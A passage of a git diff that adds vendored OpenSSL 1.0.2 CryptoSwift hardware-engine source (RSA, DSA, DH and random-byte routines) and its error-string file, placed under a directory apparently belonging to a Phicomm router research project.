+                          const BIGNUM *m, BN_CTX *ctx)
+{
+    /*
+     * I need somewhere to store temporary serialised values for use with the
+     * CryptoSwift API calls. A neat cheat - I'll use BIGNUMs from the BN_CTX
+     * but access their arrays directly as byte arrays <grin>. This way I
+     * don't have to clean anything up.
+     */
+    BIGNUM *modulus;
+    BIGNUM *exponent;
+    BIGNUM *argument;
+    BIGNUM *result;
+    SW_STATUS sw_status;
+    SW_LARGENUMBER arg, res;
+    SW_PARAM sw_param;
+    SW_CONTEXT_HANDLE hac;
+    int to_return, acquired;
+
+    modulus = exponent = argument = result = NULL;
+    to_return = 0;              /* expect failure */
+    acquired = 0;
+
+    if (!get_context(&hac)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP, CSWIFT_R_UNIT_FAILURE);
+        goto err;
+    }
+    acquired = 1;
+    /* Prepare the params */
+    BN_CTX_start(ctx);
+    modulus = BN_CTX_get(ctx);
+    exponent = BN_CTX_get(ctx);
+    argument = BN_CTX_get(ctx);
+    result = BN_CTX_get(ctx);
+    if (!result) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP, CSWIFT_R_BN_CTX_FULL);
+        goto err;
+    }
+    if (!bn_wexpand(modulus, m->top) || !bn_wexpand(exponent, p->top) ||
+        !bn_wexpand(argument, a->top) || !bn_wexpand(result, m->top)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    sw_param.type = SW_ALG_EXP;
+    sw_param.up.exp.modulus.nbytes = BN_bn2bin(m,
+                                               (unsigned char *)modulus->d);
+    sw_param.up.exp.modulus.value = (unsigned char *)modulus->d;
+    sw_param.up.exp.exponent.nbytes = BN_bn2bin(p,
+                                                (unsigned char *)exponent->d);
+    sw_param.up.exp.exponent.value = (unsigned char *)exponent->d;
+    /* Attach the key params */
+    sw_status = p_CSwift_AttachKeyParam(hac, &sw_param);
+    switch (sw_status) {
+    case SW_OK:
+        break;
+    case SW_ERR_INPUT_SIZE:
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP, CSWIFT_R_BAD_KEY_SIZE);
+        goto err;
+    default:
+        {
+            char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+            CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP, CSWIFT_R_REQUEST_FAILED);
+            sprintf(tmpbuf, "%ld", sw_status);
+            ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        }
+        goto err;
+    }
+    /* Prepare the argument and response */
+    arg.nbytes = BN_bn2bin(a, (unsigned char *)argument->d);
+    arg.value = (unsigned char *)argument->d;
+    res.nbytes = BN_num_bytes(m);
+    memset(result->d, 0, res.nbytes);
+    res.value = (unsigned char *)result->d;
+    /* Perform the operation */
+    if ((sw_status = p_CSwift_SimpleRequest(hac, SW_CMD_MODEXP, &arg, 1,
+                                            &res, 1)) != SW_OK) {
+        char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP, CSWIFT_R_REQUEST_FAILED);
+        sprintf(tmpbuf, "%ld", sw_status);
+        ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        goto err;
+    }
+    /* Convert the response */
+    BN_bin2bn((unsigned char *)result->d, res.nbytes, r);
+    to_return = 1;
+ err:
+    if (acquired)
+        release_context(hac);
+    BN_CTX_end(ctx);
+    return to_return;
+}
+
+#  ifndef OPENSSL_NO_RSA
+int cswift_bn_32copy(SW_LARGENUMBER *out, const BIGNUM *in)
+{
+    int mod;
+    int numbytes = BN_num_bytes(in);
+
+    mod = 0;
+    while (((out->nbytes = (numbytes + mod)) % 32)) {
+        mod++;
+    }
+    out->value = (unsigned char *)OPENSSL_malloc(out->nbytes);
+    if (!out->value) {
+        return 0;
+    }
+    BN_bn2bin(in, &out->value[mod]);
+    if (mod)
+        memset(out->value, 0, mod);
+
+    return 1;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+/* Un petit mod_exp chinois */
+static int cswift_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *q, const BIGNUM *dmp1,
+                              const BIGNUM *dmq1, const BIGNUM *iqmp,
+                              BN_CTX *ctx)
+{
+    SW_STATUS sw_status;
+    SW_LARGENUMBER arg, res;
+    SW_PARAM sw_param;
+    SW_CONTEXT_HANDLE hac;
+    BIGNUM *result = NULL;
+    BIGNUM *argument = NULL;
+    int to_return = 0;          /* expect failure */
+    int acquired = 0;
+
+    sw_param.up.crt.p.value = NULL;
+    sw_param.up.crt.q.value = NULL;
+    sw_param.up.crt.dmp1.value = NULL;
+    sw_param.up.crt.dmq1.value = NULL;
+    sw_param.up.crt.iqmp.value = NULL;
+
+    if (!get_context(&hac)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_UNIT_FAILURE);
+        goto err;
+    }
+    acquired = 1;
+
+    /* Prepare the params */
+    argument = BN_new();
+    result = BN_new();
+    if (!result || !argument) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BN_CTX_FULL);
+        goto err;
+    }
+
+    sw_param.type = SW_ALG_CRT;
+        /************************************************************************/
+    /*
+     * 04/02/2003
+     */
+    /*
+     * Modified by Frederic Giudicelli (deny-all.com) to overcome the
+     */
+    /*
+     * limitation of cswift with values not a multiple of 32
+     */
+        /************************************************************************/
+    if (!cswift_bn_32copy(&sw_param.up.crt.p, p)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    if (!cswift_bn_32copy(&sw_param.up.crt.q, q)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    if (!cswift_bn_32copy(&sw_param.up.crt.dmp1, dmp1)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    if (!cswift_bn_32copy(&sw_param.up.crt.dmq1, dmq1)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    if (!cswift_bn_32copy(&sw_param.up.crt.iqmp, iqmp)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    if (!bn_wexpand(argument, a->top) || !bn_wexpand(result, p->top + q->top)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+
+    /* Attach the key params */
+    sw_status = p_CSwift_AttachKeyParam(hac, &sw_param);
+    switch (sw_status) {
+    case SW_OK:
+        break;
+    case SW_ERR_INPUT_SIZE:
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_BAD_KEY_SIZE);
+        goto err;
+    default:
+        {
+            char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+            CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_REQUEST_FAILED);
+            sprintf(tmpbuf, "%ld", sw_status);
+            ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        }
+        goto err;
+    }
+    /* Prepare the argument and response */
+    arg.nbytes = BN_bn2bin(a, (unsigned char *)argument->d);
+    arg.value = (unsigned char *)argument->d;
+    res.nbytes = 2 * BN_num_bytes(p);
+    memset(result->d, 0, res.nbytes);
+    res.value = (unsigned char *)result->d;
+    /* Perform the operation */
+    if ((sw_status = p_CSwift_SimpleRequest(hac, SW_CMD_MODEXP_CRT, &arg, 1,
+                                            &res, 1)) != SW_OK) {
+        char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+        CSWIFTerr(CSWIFT_F_CSWIFT_MOD_EXP_CRT, CSWIFT_R_REQUEST_FAILED);
+        sprintf(tmpbuf, "%ld", sw_status);
+        ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        goto err;
+    }
+    /* Convert the response */
+    BN_bin2bn((unsigned char *)result->d, res.nbytes, r);
+    to_return = 1;
+ err:
+    if (sw_param.up.crt.p.value)
+        OPENSSL_free(sw_param.up.crt.p.value);
+    if (sw_param.up.crt.q.value)
+        OPENSSL_free(sw_param.up.crt.q.value);
+    if (sw_param.up.crt.dmp1.value)
+        OPENSSL_free(sw_param.up.crt.dmp1.value);
+    if (sw_param.up.crt.dmq1.value)
+        OPENSSL_free(sw_param.up.crt.dmq1.value);
+    if (sw_param.up.crt.iqmp.value)
+        OPENSSL_free(sw_param.up.crt.iqmp.value);
+    if (result)
+        BN_free(result);
+    if (argument)
+        BN_free(argument);
+    if (acquired)
+        release_context(hac);
+    return to_return;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+static int cswift_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx)
+{
+    int to_return = 0;
+    const RSA_METHOD *def_rsa_method;
+
+    if (!rsa->p || !rsa->q || !rsa->dmp1 || !rsa->dmq1 || !rsa->iqmp) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_RSA_MOD_EXP,
+                  CSWIFT_R_MISSING_KEY_COMPONENTS);
+        goto err;
+    }
+
+    /* Try the limits of RSA (2048 bits) */
+    if (BN_num_bytes(rsa->p) > 128 ||
+        BN_num_bytes(rsa->q) > 128 ||
+        BN_num_bytes(rsa->dmp1) > 128 ||
+        BN_num_bytes(rsa->dmq1) > 128 || BN_num_bytes(rsa->iqmp) > 128) {
+#   ifdef RSA_NULL
+        def_rsa_method = RSA_null_method();
+#   else
+#    if 0
+        def_rsa_method = RSA_PKCS1_RSAref();
+#    else
+        def_rsa_method = RSA_PKCS1_SSLeay();
+#    endif
+#   endif
+        if (def_rsa_method)
+            return def_rsa_method->rsa_mod_exp(r0, I, rsa, ctx);
+    }
+
+    to_return = cswift_mod_exp_crt(r0, I, rsa->p, rsa->q, rsa->dmp1,
+                                   rsa->dmq1, rsa->iqmp, ctx);
+ err:
+    return to_return;
+}
+
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int cswift_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                               const BIGNUM *m, BN_CTX *ctx,
+                               BN_MONT_CTX *m_ctx)
+{
+    const RSA_METHOD *def_rsa_method;
+
+    /* Try the limits of RSA (2048 bits) */
+    if (BN_num_bytes(r) > 256 ||
+        BN_num_bytes(a) > 256 || BN_num_bytes(m) > 256) {
+#   ifdef RSA_NULL
+        def_rsa_method = RSA_null_method();
+#   else
+#    if 0
+        def_rsa_method = RSA_PKCS1_RSAref();
+#    else
+        def_rsa_method = RSA_PKCS1_SSLeay();
+#    endif
+#   endif
+        if (def_rsa_method)
+            return def_rsa_method->bn_mod_exp(r, a, p, m, ctx, m_ctx);
+    }
+
+    return cswift_mod_exp(r, a, p, m, ctx);
+}
+#  endif                        /* OPENSSL_NO_RSA */
+
+#  ifndef OPENSSL_NO_DSA
+static DSA_SIG *cswift_dsa_sign(const unsigned char *dgst, int dlen, DSA *dsa)
+{
+    SW_CONTEXT_HANDLE hac;
+    SW_PARAM sw_param;
+    SW_STATUS sw_status;
+    SW_LARGENUMBER arg, res;
+    BN_CTX *ctx;
+    BIGNUM *dsa_p = NULL;
+    BIGNUM *dsa_q = NULL;
+    BIGNUM *dsa_g = NULL;
+    BIGNUM *dsa_key = NULL;
+    BIGNUM *result = NULL;
+    DSA_SIG *to_return = NULL;
+    int acquired = 0;
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    if (!get_context(&hac)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_SIGN, CSWIFT_R_UNIT_FAILURE);
+        goto err;
+    }
+    acquired = 1;
+    /* Prepare the params */
+    BN_CTX_start(ctx);
+    dsa_p = BN_CTX_get(ctx);
+    dsa_q = BN_CTX_get(ctx);
+    dsa_g = BN_CTX_get(ctx);
+    dsa_key = BN_CTX_get(ctx);
+    result = BN_CTX_get(ctx);
+    if (!result) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_SIGN, CSWIFT_R_BN_CTX_FULL);
+        goto err;
+    }
+    if (!bn_wexpand(dsa_p, dsa->p->top) ||
+        !bn_wexpand(dsa_q, dsa->q->top) ||
+        !bn_wexpand(dsa_g, dsa->g->top) ||
+        !bn_wexpand(dsa_key, dsa->priv_key->top) ||
+        !bn_wexpand(result, dsa->p->top)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_SIGN, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    sw_param.type = SW_ALG_DSA;
+    sw_param.up.dsa.p.nbytes = BN_bn2bin(dsa->p, (unsigned char *)dsa_p->d);
+    sw_param.up.dsa.p.value = (unsigned char *)dsa_p->d;
+    sw_param.up.dsa.q.nbytes = BN_bn2bin(dsa->q, (unsigned char *)dsa_q->d);
+    sw_param.up.dsa.q.value = (unsigned char *)dsa_q->d;
+    sw_param.up.dsa.g.nbytes = BN_bn2bin(dsa->g, (unsigned char *)dsa_g->d);
+    sw_param.up.dsa.g.value = (unsigned char *)dsa_g->d;
+    sw_param.up.dsa.key.nbytes = BN_bn2bin(dsa->priv_key,
+                                           (unsigned char *)dsa_key->d);
+    sw_param.up.dsa.key.value = (unsigned char *)dsa_key->d;
+    /* Attach the key params */
+    sw_status = p_CSwift_AttachKeyParam(hac, &sw_param);
+    switch (sw_status) {
+    case SW_OK:
+        break;
+    case SW_ERR_INPUT_SIZE:
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_SIGN, CSWIFT_R_BAD_KEY_SIZE);
+        goto err;
+    default:
+        {
+            char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+            CSWIFTerr(CSWIFT_F_CSWIFT_DSA_SIGN, CSWIFT_R_REQUEST_FAILED);
+            sprintf(tmpbuf, "%ld", sw_status);
+            ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        }
+        goto err;
+    }
+    /* Prepare the argument and response */
+    arg.nbytes = dlen;
+    arg.value = (unsigned char *)dgst;
+    res.nbytes = BN_num_bytes(dsa->p);
+    memset(result->d, 0, res.nbytes);
+    res.value = (unsigned char *)result->d;
+    /* Perform the operation */
+    sw_status = p_CSwift_SimpleRequest(hac, SW_CMD_DSS_SIGN, &arg, 1,
+                                       &res, 1);
+    if (sw_status != SW_OK) {
+        char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_SIGN, CSWIFT_R_REQUEST_FAILED);
+        sprintf(tmpbuf, "%ld", sw_status);
+        ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        goto err;
+    }
+    /* Convert the response */
+    if ((to_return = DSA_SIG_new()) == NULL)
+        goto err;
+    to_return->r = BN_bin2bn((unsigned char *)result->d, 20, NULL);
+    to_return->s = BN_bin2bn((unsigned char *)result->d + 20, 20, NULL);
+
+ err:
+    if (acquired)
+        release_context(hac);
+    if (ctx) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    return to_return;
+}
+
+static int cswift_dsa_verify(const unsigned char *dgst, int dgst_len,
+                             DSA_SIG *sig, DSA *dsa)
+{
+    SW_CONTEXT_HANDLE hac;
+    SW_PARAM sw_param;
+    SW_STATUS sw_status;
+    SW_LARGENUMBER arg[2], res;
+    unsigned long sig_result;
+    BN_CTX *ctx;
+    BIGNUM *dsa_p = NULL;
+    BIGNUM *dsa_q = NULL;
+    BIGNUM *dsa_g = NULL;
+    BIGNUM *dsa_key = NULL;
+    BIGNUM *argument = NULL;
+    int to_return = -1;
+    int acquired = 0;
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    if (!get_context(&hac)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_VERIFY, CSWIFT_R_UNIT_FAILURE);
+        goto err;
+    }
+    acquired = 1;
+    /* Prepare the params */
+    BN_CTX_start(ctx);
+    dsa_p = BN_CTX_get(ctx);
+    dsa_q = BN_CTX_get(ctx);
+    dsa_g = BN_CTX_get(ctx);
+    dsa_key = BN_CTX_get(ctx);
+    argument = BN_CTX_get(ctx);
+    if (!argument) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_VERIFY, CSWIFT_R_BN_CTX_FULL);
+        goto err;
+    }
+    if (!bn_wexpand(dsa_p, dsa->p->top) ||
+        !bn_wexpand(dsa_q, dsa->q->top) ||
+        !bn_wexpand(dsa_g, dsa->g->top) ||
+        !bn_wexpand(dsa_key, dsa->pub_key->top) ||
+        !bn_wexpand(argument, 40)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_VERIFY, CSWIFT_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+    sw_param.type = SW_ALG_DSA;
+    sw_param.up.dsa.p.nbytes = BN_bn2bin(dsa->p, (unsigned char *)dsa_p->d);
+    sw_param.up.dsa.p.value = (unsigned char *)dsa_p->d;
+    sw_param.up.dsa.q.nbytes = BN_bn2bin(dsa->q, (unsigned char *)dsa_q->d);
+    sw_param.up.dsa.q.value = (unsigned char *)dsa_q->d;
+    sw_param.up.dsa.g.nbytes = BN_bn2bin(dsa->g, (unsigned char *)dsa_g->d);
+    sw_param.up.dsa.g.value = (unsigned char *)dsa_g->d;
+    sw_param.up.dsa.key.nbytes = BN_bn2bin(dsa->pub_key,
+                                           (unsigned char *)dsa_key->d);
+    sw_param.up.dsa.key.value = (unsigned char *)dsa_key->d;
+    /* Attach the key params */
+    sw_status = p_CSwift_AttachKeyParam(hac, &sw_param);
+    switch (sw_status) {
+    case SW_OK:
+        break;
+    case SW_ERR_INPUT_SIZE:
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_VERIFY, CSWIFT_R_BAD_KEY_SIZE);
+        goto err;
+    default:
+        {
+            char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+            CSWIFTerr(CSWIFT_F_CSWIFT_DSA_VERIFY, CSWIFT_R_REQUEST_FAILED);
+            sprintf(tmpbuf, "%ld", sw_status);
+            ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        }
+        goto err;
+    }
+    /* Prepare the argument and response */
+    arg[0].nbytes = dgst_len;
+    arg[0].value = (unsigned char *)dgst;
+    arg[1].nbytes = 40;
+    arg[1].value = (unsigned char *)argument->d;
+    memset(arg[1].value, 0, 40);
+    BN_bn2bin(sig->r, arg[1].value + 20 - BN_num_bytes(sig->r));
+    BN_bn2bin(sig->s, arg[1].value + 40 - BN_num_bytes(sig->s));
+    res.nbytes = 4;             /* unsigned long */
+    res.value = (unsigned char *)(&sig_result);
+    /* Perform the operation */
+    sw_status = p_CSwift_SimpleRequest(hac, SW_CMD_DSS_VERIFY, arg, 2,
+                                       &res, 1);
+    if (sw_status != SW_OK) {
+        char tmpbuf[DECIMAL_SIZE(sw_status) + 1];
+        CSWIFTerr(CSWIFT_F_CSWIFT_DSA_VERIFY, CSWIFT_R_REQUEST_FAILED);
+        sprintf(tmpbuf, "%ld", sw_status);
+        ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+        goto err;
+    }
+    /* Convert the response */
+    to_return = ((sig_result == 0) ? 0 : 1);
+
+ err:
+    if (acquired)
+        release_context(hac);
+    if (ctx) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    return to_return;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int cswift_mod_exp_dh(const DH *dh, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return cswift_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+/* Random bytes are good */
+static int cswift_rand_bytes(unsigned char *buf, int num)
+{
+    SW_CONTEXT_HANDLE hac;
+    SW_STATUS swrc;
+    SW_LARGENUMBER largenum;
+    int acquired = 0;
+    int to_return = 0;          /* assume failure */
+    unsigned char buf32[1024];
+
+    if (!get_context(&hac)) {
+        CSWIFTerr(CSWIFT_F_CSWIFT_RAND_BYTES, CSWIFT_R_UNIT_FAILURE);
+        goto err;
+    }
+    acquired = 1;
+
+        /************************************************************************/
+    /*
+     * 04/02/2003
+     */
+    /*
+     * Modified by Frederic Giudicelli (deny-all.com) to overcome the
+     */
+    /*
+     * limitation of cswift with values not a multiple of 32
+     */
+        /************************************************************************/
+
+    while (num >= (int)sizeof(buf32)) {
+        largenum.value = buf;
+        largenum.nbytes = sizeof(buf32);
+        /*-
+         * tell CryptoSwift how many bytes we want and where we want it.
+         * Note: - CryptoSwift cannot do more than 4096 bytes at a time.
+         *       - CryptoSwift can only do multiple of 32-bits.
+         */
+        swrc =
+            p_CSwift_SimpleRequest(hac, SW_CMD_RAND, NULL, 0, &largenum, 1);
+        if (swrc != SW_OK) {
+            char tmpbuf[20];
+            CSWIFTerr(CSWIFT_F_CSWIFT_RAND_BYTES, CSWIFT_R_REQUEST_FAILED);
+            sprintf(tmpbuf, "%ld", swrc);
+            ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+            goto err;
+        }
+        buf += sizeof(buf32);
+        num -= sizeof(buf32);
+    }
+    if (num) {
+        largenum.nbytes = sizeof(buf32);
+        largenum.value = buf32;
+        swrc =
+            p_CSwift_SimpleRequest(hac, SW_CMD_RAND, NULL, 0, &largenum, 1);
+        if (swrc != SW_OK) {
+            char tmpbuf[20];
+            CSWIFTerr(CSWIFT_F_CSWIFT_RAND_BYTES, CSWIFT_R_REQUEST_FAILED);
+            sprintf(tmpbuf, "%ld", swrc);
+            ERR_add_error_data(2, "CryptoSwift error number is ", tmpbuf);
+            goto err;
+        }
+        memcpy(buf, largenum.value, num);
+    }
+
+    to_return = 1;              /* success */
+ err:
+    if (acquired)
+        release_context(hac);
+
+    return to_return;
+}
+
+static int cswift_rand_status(void)
+{
+    return 1;
+}
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_cswift_id) != 0))
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* OPENSSL_NO_DYNAMIC_ENGINE */
+# endif                         /* !OPENSSL_NO_HW_CSWIFT */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift.ec
new file mode 100644
index 0000000..a7f9d11
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift.ec
@@ -0,0 +1 @@
+L CSWIFT	e_cswift_err.h			e_cswift_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift_err.c
new file mode 100644
index 0000000..f8a2cbb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_cswift_err.c
@@ -0,0 +1,150 @@
+/* e_cswift_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_cswift_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA CSWIFT_str_functs[] = {
+    {ERR_FUNC(CSWIFT_F_CSWIFT_CTRL), "CSWIFT_CTRL"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_DSA_SIGN), "CSWIFT_DSA_SIGN"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_DSA_VERIFY), "CSWIFT_DSA_VERIFY"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_FINISH), "CSWIFT_FINISH"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_INIT), "CSWIFT_INIT"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_MOD_EXP), "CSWIFT_MOD_EXP"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_MOD_EXP_CRT), "CSWIFT_MOD_EXP_CRT"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_RAND_BYTES), "CSWIFT_RAND_BYTES"},
+    {ERR_FUNC(CSWIFT_F_CSWIFT_RSA_MOD_EXP), "CSWIFT_RSA_MOD_EXP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA CSWIFT_str_reasons[] = {
+    {ERR_REASON(CSWIFT_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(CSWIFT_R_BAD_KEY_SIZE), "bad key size"},
+    {ERR_REASON(CSWIFT_R_BN_CTX_FULL), "bn ctx full"},
+    {ERR_REASON(CSWIFT_R_BN_EXPAND_FAIL), "bn expand fail"},
+    {ERR_REASON(CSWIFT_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(CSWIFT_R_MISSING_KEY_COMPONENTS), "missing key components"},
+    {ERR_REASON(CSWIFT_R_NOT_LOADED), "not loaded"},
+    {ERR_REASON(CSWIFT_R_REQUEST_FAILED), "request failed"},
+    {ERR_REASON(CSWIFT_R_UNIT_FAILURE), "unit failure"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef CSWIFT_LIB_NAME
+static ERR_STRING_DATA CSWIFT_lib_name[] = {
+    {0, CSWIFT_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int CSWIFT_lib_error_code = 0;
+static int CSWIFT_error_init = 1;
+
+static void ERR_load_CSWIFT_strings(void)
+{
+    if (CSWIFT_lib_error_code == 0)
+        CSWIFT_lib_error_code = ERR_get_next_error_library();
+
+    if (CSWIFT_error_init) {
+        CSWIFT_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(CSWIFT_lib_error_code, CSWIFT_str_functs);
+        ERR_load_strings(CSWIFT_lib_error_code, CSWIFT_str_reasons);
+#endif
+
+#ifdef CSWIFT_LIB_NAME
+        CSWIFT_lib_name->error = ERR_PACK(CSWIFT_lib_error_code, 0, 0);
+        ERR_load_strings(0, CSWIFT_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_CSWIFT_strings(void)
+{
+    if (CSWIFT_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(CSWIFT_lib_error_code, CSWIFT_str_functs);
